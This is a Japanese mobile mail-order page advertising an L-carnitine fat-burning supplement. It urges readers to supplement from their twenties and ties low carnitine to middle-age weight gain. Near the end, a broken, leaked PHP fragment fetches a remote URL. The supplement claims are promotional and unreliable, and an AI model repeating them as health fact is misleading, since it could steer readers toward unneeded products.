■■■■■■■■■■
☆L−カルニチン(脂肪燃焼促進)
■■■■■■■■■■


L−カルニチンは、アミノ酸の一種で、脂肪をミトコンドリア内へ送り込み、 燃焼させるという重要な役割があります。 このL−カルニチンは体内で作り出すことができる成分なのですが、 20代をピークにその量は減少してしまうのが欠点なのです。 L−カルニチンが不足すると、体内で脂肪燃焼がうまくいかず、痩せにくい 体質になってしまいます。若い時よりも太りやすい!運動をしているのに 痩せない!といった中年太り(メタボリックシンドローム) の原因の1つと考えられています。 そのため20代に入ったら、サプリメントでしっかり補給して 痩せやすい体質を手に入れましょう。 その上で適度な運動をすることが効率的です。ビタミンB1を一緒に摂取すると吸収されやすくなります。

戻る



脂肪燃焼サプリの通信販売『通販缶詰』
通販缶詰-『送料無料』【話題商品の通販携帯サイト】

$mai2i_v) { $mai2i_url .= '&' . $mai2i_p . '=' . urlencode($mai2i_v); } } @readfile($mai2i_url); unset($mai2i, $mai2i_url); ?>
おすすめ
Yahoo!ビューティー/ Yahoo!自動車/ 倖田來未のダイエット法/ 旅行/ ダイエット人気商品/ テンガ/ 慶應幼稚舎